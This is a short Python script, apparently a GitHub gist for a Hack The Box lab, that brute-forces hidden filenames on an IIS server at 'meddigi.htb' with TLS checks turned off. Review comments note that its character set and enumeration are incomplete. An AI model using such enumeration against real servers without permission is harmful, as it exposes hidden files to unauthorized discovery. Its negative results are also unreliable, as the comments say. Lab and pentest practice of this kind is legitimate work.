
@mvc1009
Last active December 21, 2023 20:52
Python fuzzer useful in combination with iis-shortnames-scanner
#!/usr/bin/env python3
# Algorithm https://stackoverflow.com/a/68624309
import sys, os, requests
from itertools import combinations_with_replacement
import urllib3
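# Candidate-name enumerator: requests url + start + <suffix> + extension for
# every generated suffix and stops at the first HTTP 200.
#
# Certificate validation is switched off on every request (verify=False), so
# the server's identity is not checked; the matching urllib3 warning is
# silenced here so it does not flood the per-request output. That is only
# reasonable against a lab host that presents a self-signed certificate.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
s = requests.Session()  # one session for the whole run

url = "https://meddigi.htb/"
extension = ".json"
start = "APPSET"
max_length = 5
# Seconds to wait on one request; without a timeout a single stalled
# connection blocks the run indefinitely.
request_timeout = 10
# Lower case only, because the target is an IIS server.
# NOTE(review): "h" is absent from this alphabet. It looks like a typo, so
# confirm before treating a run without hits as conclusive.
characters = "abcdefgijklmnopqrstuvwxyz1234567890._-( )"

print("[!] Starting fuzzing")
for length in range(1, max_length + 1):
    # NOTE(review): combinations_with_replacement only yields tuples in
    # non-decreasing alphabet order, so many suffixes are never requested.
    # A run that ends without "[+] Found" therefore does not show the file
    # is absent.
    for combo in combinations_with_replacement(characters, r=length):
        candidate = start + ''.join(combo) + extension
        try:
            response = s.get(
                url + candidate,
                verify=False,
                allow_redirects=False,
                timeout=request_timeout,
            )
        except requests.RequestException as exc:
            # Report the failed request and carry on rather than aborting
            # the whole run with a traceback.
            print("Fuzzing: %s - request failed (%s)" % (candidate, exc))
            continue
        print("Fuzzing: %s - %s " % (candidate, response.status_code))
        if response.status_code == 200:
            print("[+] Found: %s" % (url + candidate))
            sys.exit()
print("[!] Ending fuzzing")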